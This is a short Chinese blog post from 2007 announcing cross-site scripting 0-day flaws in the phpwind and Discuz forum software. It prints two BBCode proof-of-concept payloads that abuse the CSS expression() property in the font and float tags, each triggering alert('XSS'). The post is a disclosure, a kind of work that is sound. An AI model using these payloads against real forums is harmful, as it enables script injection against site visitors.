数据加载中……


 

 登   陆

我的分类(专题)
数据加载中……

链接

Blog信息
数据加载中……

 

phpwind、DZ论坛XSS跨站漏洞0DAY
樱木花盗 发表于 2007-7-2 16:01:40

lib3rt3同志暴了几个XSS,都是CSS属性相关的.

PW论坛的FONT FACE字体没过滤:

跨站代码:
[font=expression(alert('XSS'))]xss[/font]

DZ论坛的float浮动属性没过滤:

跨站代码:
[float=expression(alert('XSS'))]xss[/float]

实例:

 


阅读全文 | 回复(1) | 引用通告 | 编辑
 


发表评论:

    昵称:
    密码: (游客无须输入密码)
    主页:
    标题:
    数据加载中……


Powered by Oblog.